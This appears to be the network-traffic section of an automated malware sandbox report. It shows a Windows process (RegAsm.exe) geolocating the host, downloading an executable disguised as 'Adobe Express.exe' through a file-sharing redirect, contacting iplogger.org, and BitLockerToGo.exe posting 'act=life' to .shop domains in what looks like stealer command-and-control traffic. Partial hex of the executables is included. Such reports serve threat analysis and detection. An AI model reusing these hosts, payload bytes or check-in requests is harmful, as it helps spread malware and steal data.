Sep 4, 2024 17:38:20.118979931 CEST	1236	IN	Data Raw: ca 73 51 ff fe 09 e9 d4 72 97 a8 5b e9 6f 1c 69 7a a7 2b 46 55 2c 84 e1 9a 16 4a 53 01 1a 6c 65 bc fb ee 7f 0a 3a 0d b9 3c dd 28 a2 0b 13 55 56 2d 9a af 61 7d c2 9c 94 f7 08 db ca 87 35 23 b6 b1 21 7e 18 b4 7a f1 62 5a 1c b7 77 b9 6c 46 f6 19 75 Data Ascii: sQr[oiz+FU,JSle:<(UV-a}5#!~zbZwlFua2KdynX==h>}CWc51J<#RGl)d$?n:E/bKQ/M3b?~3%b4r=#}Xb!6:"pA5
Sep 4, 2024 17:38:20.120779991 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:19 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf~& @@ `$&W@(&`$ H.text `.rsrc@@@.reloc`@B`&H,`pN7nQ.de$[ABCU1#^56i%^Ea9[ctqZ;6z[^X'/VHW,w]~5"Ox2`b2X>=\l#xS,~,"z<cZ.m%}R?G*9Xs$FL@\{.J~\T@C:qnzlX3 k$Dq4

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	104.237.62.213	443	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:36:59 UTC	202	OUT	GET /?format=json HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: api64.ipify.org
2024-09-04 15:36:59 UTC	156	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:36:59 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin
2024-09-04 15:36:59 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"ip":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49715	34.117.59.81	443	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:00 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: ipinfo.io
2024-09-04 15:37:00 UTC	458	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 1025 content-type: application/json; charset=utf-8 date: Wed, 04 Sep 2024 15:37:00 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-04 15:37:00 UTC	932	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-09-04 15:37:00 UTC	93	IN	Data Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49725	76.76.21.98	443	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:06 UTC	209	OUT	GET /download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: file-link-iota.vercel.app Cache-Control: no-cache
2024-09-04 15:37:06 UTC	561	IN	HTTP/1.1 307 Temporary Redirect Cache-Control: public, max-age=0, must-revalidate Content-Type: text/plain Date: Wed, 04 Sep 2024 15:37:06 GMT Location: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 Server: Vercel Strict-Transport-Security: max-age=63072000; includeSubDomains; preload X-Vercel-Id: iad1::prjzt-1725464226734-809fb8c82c3e Connection: close Transfer-Encoding: chunked
2024-09-04 15:37:06 UTC	20	IN	Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a Data Ascii: fRedirecting...
2024-09-04 15:37:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	158.69.225.124	443	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:07 UTC	402	OUT	GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cache-Control: no-cache Host: youtransfer.net Connection: Keep-Alive
2024-09-04 15:37:08 UTC	574	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:07 GMT Content-Type: "application/octet-stream" Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.0.30 Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename*=UTF-8''Adobe%20Express.exe; filename="Adobe Express.exe" Content-Transfer-Encoding: binary Expires: 0 Pragma: no-cache Set-Cookie: droppy_session=ihfnb6rk7dmkitgq6camtqo91qr6pnh0; expires=Wed, 04-Sep-2024 17:37:07 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax X-Powered-By: PleskLin
2024-09-04 15:37:08 UTC	15810	IN	Data Raw: 31 64 66 35 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 90 62 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 56 2e 00 00 f4 04 00 00 00 00 00 30 2b 07 00 00 10 00 00 00 a0 5c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 66 00 00 04 00 00 d3 81 64 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 Data Ascii: 1df5MZ@!L!This program cannot be run in DOS mode.$PELbV.0+\@fd@
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: f7 f1 85 d2 75 04 83 c4 08 c3 8d 05 33 f5 77 00 89 04 24 c7 44 24 04 41 00 00 00 e8 0c 6f 06 00 e8 a7 0d 03 00 90 e8 81 c1 06 00 eb af cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d 28 6d a2 0d 0a 32 30 30 30 0d 0a 00 64 8b 09 8b 09 3b 61 08 0f 86 e3 01 00 00 83 ec 2c 8b 44 24 30 0f b6 48 41 84 c9 0f 84 b9 01 00 00 8b 48 10 c1 e1 0d 81 f9 00 00 40 00 0f 85 91 01 00 00 c6 44 24 17 01 0f b6 4c 24 17 88 48 3e 8b 48 10 c1 e1 0d 8b 50 0c 89 14 24 89 4c 24 04 e8 75 d4 00 00 8b 44 24 30 8b 48 10 8d 15 70 7c a2 00 89 14 24 c1 e1 0d 31 d2 29 ca 89 54 24 04 b9 00 00 00 00 83 d9 00 89 4c 24 08 e8 c9 bf 02 00 8b 44 24 30 8b 48 44 8d 15 90 7c a2 00 89 14 24 89 4c 24 04 c7 44 24 08 00 00 00 00 e8 18 21 07 00 8d 05 00 a9 a2 00 89 04 24 e8 ba c0 02 00 8b 44 24 04 84 Data Ascii: u3w$D$Ao(m2000d;a,D$0HAH@D$L$H>HP$L$uD$0Hp\|$1)T$L$D$0HD\|$L$D$!$D$
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 5b 8b 44 24 54 f3 0f 10 00 f3 0f 5a c0 f2 0f 11 44 24 20 f3 0f 10 48 04 f3 0f 11 4c 24 28 e8 39 fb 02 00 8b 44 24 44 89 04 24 8b 44 24 14 89 44 24 04 e8 85 03 03 00 f2 0f 10 44 24 20 f2 0f 11 04 24 f3 0f 10 44 24 28 f3 0f 5a c0 f2 0f 11 44 24 0d 0a 32 30 30 30 0d 0a 08 e8 d5 ff 02 00 e8 60 fb 02 00 83 c4 4c c3 e8 57 81 06 00 e9 b2 f7 ff ff cc cc 8b 0d 28 6d a2 00 64 8b 09 8b 09 3b 61 08 0f 86 cb 00 00 00 83 ec 20 8b 44 24 28 8b 4c 24 24 eb 64 89 44 24 10 89 4c 24 14 e8 c2 fa 02 00 8b 44 24 1c 89 04 24 8b 4c 24 14 89 4c 24 04 e8 0e 03 03 00 e8 09 fb 02 00 e8 a4 fa 02 00 8d 05 74 aa 7d 00 89 04 24 c7 44 24 04 01 00 00 00 e8 ee 02 03 00 e8 e9 fa 02 00 8b 44 24 18 8b 4c 24 10 29 c8 48 89 c1 f7 d9 c1 f9 1f 8b 54 24 14 21 ca 8b 4c 24 1c 01 d1 89 4c 24 1c 89 44 Data Ascii: [D$TZD$ HL$(9D$D$D$D$D$ $D$(ZD$2000`LW(md;a D$(L$$dD$L$D$$L$L$t}$D$D$L$)HT$!L$L$D
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 0f 83 14 01 00 00 8d 15 80 f4 9c 00 0f b6 14 0a 83 fa 44 0f 83 f5 00 00 00 8d 1d e0 e7 9c 00 0f b7 14 53 29 fd 29 ea 89 f9 8b 5c 24 18 89 d7 8b 54 24 0c eb 1a 8d 8f ff 1f 00 00 39 cf 76 04 89 f9 eb 0c 81 e1 00 e0 ff ff 89 cd 89 f9 89 ef 39 cf 74 1a 85 f6 0f 84 ae 00 00 00 89 f8 31 d2 f7 f6 0d 0a 31 30 30 30 0d 0a 8b 54 24 0c eb 06 8b 5c 24 18 89 d0 89 44 24 10 8b 4c 24 20 85 c9 74 30 8b 6b 28 8b 75 00 8b 6d 04 0f af f0 85 ed 74 0e 89 0c 24 89 74 24 04 e8 97 d7 05 00 eb 0c 89 0c 24 89 74 24 04 e8 e9 5c 06 00 8b 44 24 20 eb 13 8b 4b 28 89 0c 24 89 44 24 04 e8 d4 a9 05 00 8b 44 24 08 8b 4c 24 10 8b 54 24 0c 39 d1 74 33 8b 5c 24 18 0f b7 5b 32 0f af d3 49 0f af cb 01 c1 8b 2d b8 6f a2 00 8d 4c 19 fc 84 01 01 c2 85 ed 74 0c e8 ec 54 06 00 89 07 8b 19 89 5f 04 Data Ascii: DS))\$T$9v9t11000T$\$D$L$ t0k(umt$t$$t$\D$ K($D$D$L$T$9t3\$[2I-oLtT_
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 00 00 00 31 d2 f7 f1 0f af c8 ba 01 00 00 00 d3 e2 83 f9 20 19 c0 21 d0 8d 50 ff 21 d3 8b 54 24 20 89 cd e9 23 ff ff ff e8 d7 4d 02 00 8d 69 07 89 d9 8b 5c 24 18 89 4c 24 08 0f b6 37 89 74 24 24 83 e6 7f 89 e9 d3 e6 47 90 83 f9 20 19 db 21 de 8b 5c 24 08 09 f3 8b 74 24 24 f7 c6 80 00 00 00 75 ca 89 dd 8b 5c 24 18 e9 14 fd ff ff 88 1a 83 c0 f8 90 c1 eb 08 42 85 c0 77 f2 89 4c 24 44 83 c4 38 c3 89 4c 24 10 0f b6 37 89 c1 d3 e6 09 f3 8b 74 24 10 46 90 88 1a 90 c1 eb 08 47 42 89 f1 8b 74 24 24 39 e9 72 db 83 e6 07 85 f6 76 0d 0f b6 2f 89 c1 d3 e5 09 eb 90 01 f0 47 89 d1 89 dd e9 76 fc ff ff e8 19 01 06 00 e9 44 fc ff ff cc cc cc cc 8b 0d 28 6d a2 00 64 8b 09 8b 09 3b 61 08 76 60 83 ec 18 8b 44 24 1c 83 c0 1f c1 e8 05 05 ff 1f 00 00 c1 e8 0d 8b 4c 24 20 83 c1 Data Ascii: 1 !P!T$ #Mi\$L$7t$$G !\$t$$u\$BwL$D8L$7t$FGBt$$9rv/GvD(md;av`D$L$
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 75 04 31 c0 eb 21 89 3c 24 89 44 24 04 c6 44 24 08 01 e8 8d 19 05 00 8b 44 24 0c 8b 6c 24 44 8b 74 24 3c 8b 7c 24 40 85 c0 0f 84 0d 01 00 00 0f b7 46 22 25 ff 7f 00 00 90 66 85 c0 75 06 31 c9 31 c0 eb 47 0f b6 4e 0c f6 c1 01 74 07 b9 34 00 00 00 eb 05 b9 24 00 00 00 0f b7 56 20 01 d0 0f b7 c0 01 ce 3d 00 00 02 00 0f 87 c1 00 00 00 0f b7 d2 39 c2 0f 87 ad 00 00 00 29 d0 89 c1 f7 d8 c1 e2 02 c1 f8 1f 21 c2 8d 04 16 31 d2 31 db eb 40 8d 05 30 4e 41 00 89 44 24 64 8d 44 24 70 89 44 24 68 8d 44 24 64 89 04 24 e8 55 c0 05 00 83 c4 6c c3 83 c4 6c c3 8b 34 90 0f b6 6e 0d 8d 5c 2b ff 87 dd f7 db 87 dd 21 eb 42 03 1e 8b 6c 24 44 39 d1 7f e2 8d 43 03 83 e0 fc 89 44 24 34 90 e8 af f7 ff ff 8d 05 c0 4d 41 00 89 44 24 4c 8d 44 24 70 89 44 24 50 8d 44 24 78 89 44 24 54 Data Ascii: u1!<$D$D$D$l$Dt$<\|$@F"%fu11GNt4$V =9)!11@0NAD$dD$pD$hD$d$Ull4n\+!Bl$D9CD$4MAD$LD$pD$PD$xD$T
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 44 24 0c 8b 0d 80 ed a0 00 89 4c 24 14 90 90 8d 15 20 ec a0 00 89 14 24 e8 07 1f ff ff 8b 44 24 0c 8b 4c 24 14 31 d2 eb 35 89 54 24 10 8b 05 54 ed a0 00 84 00 8b 04 98 84 00 05 40 08 00 00 89 04 24 c7 44 24 04 40 00 00 00 e8 75 9d 05 00 8b 44 24 10 8d 50 01 8b 44 24 0c 8b 4c 24 14 39 c2 7d 0d 8b 1c 91 81 fb 00 04 00 00 72 bc eb 3a c7 05 48 82 a0 00 00 00 00 00 c7 05 4c 82 a0 00 00 00 00 00 8d 05 c8 7b a2 00 89 04 24 e8 a3 e2 05 00 8b 44 24 04 8b 4c 24 08 0d 0a 32 30 30 30 0d 0a 89 05 ac 82 a0 00 89 0d b0 82 a0 00 83 c4 18 c3 89 d8 b9 00 04 00 00 e8 df 95 05 00 90 e8 b9 4b 05 00 e9 04 ff ff ff cc cc cc cc 8b 0d 28 6d a2 00 64 8b 09 8b 09 3b 61 08 76 32 83 ec 0c 8b 59 10 85 db 75 2f 8b 42 08 89 44 24 08 90 8b 05 c4 6e a0 00 89 04 24 c7 44 24 04 00 00 00 00 Data Ascii: D$L$ $D$L$15T$T@$D$@uD$PD$L$9}r:HL{$D$L$2000K(md;av2Yu/BD$n$D$
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: c7 44 24 04 01 00 00 00 e8 37 a2 05 00 8b 44 24 08 48 39 05 54 82 a0 00 76 4e 8b 4c 24 50 89 0c 24 89 44 24 04 0f b6 44 24 17 88 44 24 08 e8 01 d8 ff ff 8b 54 24 44 85 d2 75 04 31 c0 eb 0c 8b 02 ff d0 0f b6 04 24 8b 54 24 44 84 c0 0f 84 01 ff ff ff 8b 44 24 50 8b 74 24 54 8b 7c 24 3c 8b 4c 24 18 e9 5b fe ff ff 8b 4c 24 40 8b 5c 24 20 8b 6c 24 24 8b 74 24 54 8b 7c 24 3c 8b 54 24 48 e9 88 fb ff ff 8d 05 32 18 77 00 89 04 24 c7 44 24 04 17 00 00 00 e8 f9 ee 04 00 90 e8 73 41 05 00 e9 7e fa ff ff cc cc cc 0d 0a 32 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc 8b 0d 28 6d a2 00 64 8b 09 8b 09 3b 61 0c 0f 86 b1 02 00 00 83 ec 20 0f b6 15 b8 6f a2 00 84 d2 0f 84 88 02 00 00 8b 54 24 24 8b 5a 10 8b 6a 14 8b 35 28 6d a2 00 64 8b 36 8b 36 8b 76 18 8b 76 50 89 74 Data Ascii: D$7D$H9TvNL$P$D$D$D$T$Du1$T$DD$Pt$T\|$<L$[L$@\$ l$$t$T\|$<T$H2w$D$sA~2000(md;a oT$$Zj5(md66vvPt
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: e8 47 82 01 00 8d 05 99 81 76 00 89 04 24 c7 44 24 04 05 00 00 00 e8 11 84 01 00 8b 44 24 2c 89 04 24 8b 44 24 1c 89 44 24 04 e8 1d 82 01 00 e8 98 7d 01 00 e8 f3 7b 01 00 8d 05 2b 34 77 00 89 04 24 c7 44 24 04 1a 00 00 00 e8 5d af 04 00 90 e8 d7 01 05 00 e9 12 ff ff ff cc cc 8b 0d 28 6d a2 00 64 8b 09 8b 09 3b 61 0c 0f 86 0c 01 00 00 83 ec 28 90 8d 05 bc 77 a0 00 89 04 24 e8 5a 60 05 00 81 7c 24 04 00 00 00 80 8d 05 60 7b a2 00 89 04 24 0f 94 c1 88 4c 24 04 e8 fd f6 ff ff 8b 05 28 6c a2 00 85 c0 74 0e 8d 05 60 7b a2 00 89 04 24 e8 45 d8 ff ff 0f b6 05 f0 92 a0 00 84 c0 75 06 31 c9 31 c0 eb 0c e8 0f c5 03 00 8b 04 24 8b 4c 24 04 85 c9 74 28 89 4c 24 18 89 44 24 24 89 04 24 89 4c 24 04 e8 80 dd 03 00 8b 44 24 24 89 04 24 8b 44 24 18 89 44 24 04 e8 0c c6 03 Data Ascii: Gv$D$D$,$D$D$}{+4w$D$](md;a(w$Z`\|$`{$L$(lt`{$Eu11$L$t(L$D$$$L$D$$$D$D$
2024-09-04 15:37:08 UTC	16384	IN	Data Raw: 00 8d 05 90 90 76 00 89 04 24 c7 44 24 04 08 00 00 00 e8 25 44 01 00 8b 44 24 64 89 04 24 c7 44 24 04 00 00 00 00 e8 01 41 01 00 e8 ac 3d 01 00 e8 07 3c 01 00 8d 05 a6 67 77 00 89 04 24 c7 44 24 04 20 00 00 00 e8 71 6f 04 00 41 0f b7 68 1a 83 c5 07 c1 ed 03 39 e9 0f 83 15 f9 ff ff 8b 68 2c 84 45 00 0f b6 2c 29 8b 70 28 84 06 0f b6 34 31 87 de f7 d3 87 de 95 87 de 84 c3 87 de 95 74 ca 89 4c 24 40 89 04 24 e8 0f 06 00 00 8b 44 24 30 8b 4c 24 40 0f b6 54 24 17 8b 5c 24 2c eb ab ff 84 24 a4 00 00 00 41 0f b7 68 1a 39 e9 0f 83 5f f8 ff ff 8b ac 24 90 00 00 00 0f b6 b4 24 94 00 00 00 0f b6 6d 00 96 87 dd 84 c3 87 dd 96 0f 85 e1 00 00 00 0f b7 68 18 39 ac 24 a4 00 00 00 72 21 8b ac 24 9c 00 00 00 0f b6 b4 24 a0 00 00 00 0f b6 6d 00 96 87 dd 84 c3 87 dd 96 0f 84 Data Ascii: v$D$%DD$d$D$A=<gw$D$ qoAh9h,E,)p(41tL$@$D$0L$@T$\$,$Ah9_$$mh9$r!$$m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	53024	104.26.2.46	443	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:27 UTC	196	OUT	GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: iplogger.org
2024-09-04 15:37:27 UTC	998	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:27 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.4308929443359375 expires: Wed, 04 Sep 2024 15:37:27 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 40589004137263905=2; expires=Thu, 04 Sep 2025 15:37:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.33; expires=Thu, 04 Sep 2025 15:37:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGYHfKq3GBQXwGcVvinSjJtXBPb6qb8%2FpNO554DIBY6KfcJGr6wPL5hEQW922Oyo6oBDs9z5DrAuc%2F06n4%2FrLl%2B71mEf%2FxM9OtUdkRv2Lc4hIIBN8h6Fg4312%2B2emw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf0f98586dc475-EWR
2024-09-04 15:37:27 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-09-04 15:37:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	53035	188.114.97.3	443	5352	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:44 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stamppreewntnq.shop
2024-09-04 15:37:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-04 15:37:44 UTC	798	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=06tsbeo2b29kje4dpedd7v5gct; expires=Sun, 29 Dec 2024 09:24:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqwy3NEXkWqxm5NMplYcecrpRMo6jZGeH%2BA2gprDQuK4SdC1SFzhOvSlXTZVnAs8jRDZ1UARizK%2BN6xLTOcAwQojGdkzOYH0OTr2yGsJ0lNLsOhioRLAUmFZJry3GmsmIPSALxUZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf100429af4304-EWR alt-svc: h3=":443"; ma=86400
2024-09-04 15:37:44 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-04 15:37:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	53036	172.67.146.35	443	6828	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:44 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condedqpwqm.shop
2024-09-04 15:37:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-04 15:37:44 UTC	545	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGeNt641pgZqgRjb%2FipZ6uV982Qa4Z7W1i8DE%2B0KdKVMw78MeEt5%2Fdmrt96SbQLyxyTFQ0MFmC9PHJfu7Tc4TkPJzPu4oByvnHsp8MHY9XDCDLsgvkEsgtq7POTZadhGoAHo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf10067fc441d9-EWR
